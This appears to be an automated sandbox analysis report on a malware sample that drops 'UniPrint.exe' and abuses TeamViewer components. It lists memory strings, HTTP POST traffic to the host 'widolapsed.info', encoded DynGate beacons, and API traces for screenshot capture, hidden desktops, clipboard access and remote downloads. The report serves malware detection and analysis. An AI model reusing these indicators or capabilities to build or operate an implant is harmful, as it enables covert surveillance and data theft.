Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316700720.000001BF60664000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316800598.000001BF60645000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316785328.000001BF60640000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.460571183.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.441746843.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.438725277.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmp String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: unknown HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76431Content-Type: multipart/form-data; boundary=--------3259937207User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985DF0 InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_70985DF0
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70986B70 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectW,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC, 2_2_70986B70
Creates a DirectInput object (often for capturing keystrokes)
Source: wogZe27GBB.exe, 00000000.00000002.248869618.000000000077A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard, 0_2_00405042
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098A020 GetCurrentThreadId,GetThreadDesktop,StrChrW,CreateDesktopW,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop, 2_2_7098A020

System Summary:

Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040323C
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_70985F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 4_2_70985F30
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00404853 0_2_00404853
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00406131 0_2_00406131
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053C2D6 4_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004A13AA 4_2_004A13AA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053E430 4_2_0053E430
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004C97CD 4_2_004C97CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00534810 4_2_00534810
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_005438ED 4_2_005438ED
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004AC8A9 4_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00544B6A 4_2_00544B6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004B9F5A 4_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00546FFB 4_2_00546FFB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004A0FB2 4_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292F7CD 17_3_0292F7CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292F9EC 17_3_0292F9EC
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292F965 17_3_0292F965
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0294C17D 17_3_0294C17D
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 20_3_02880ABB 20_3_02880ABB
Found potential string decryption / allocating functions
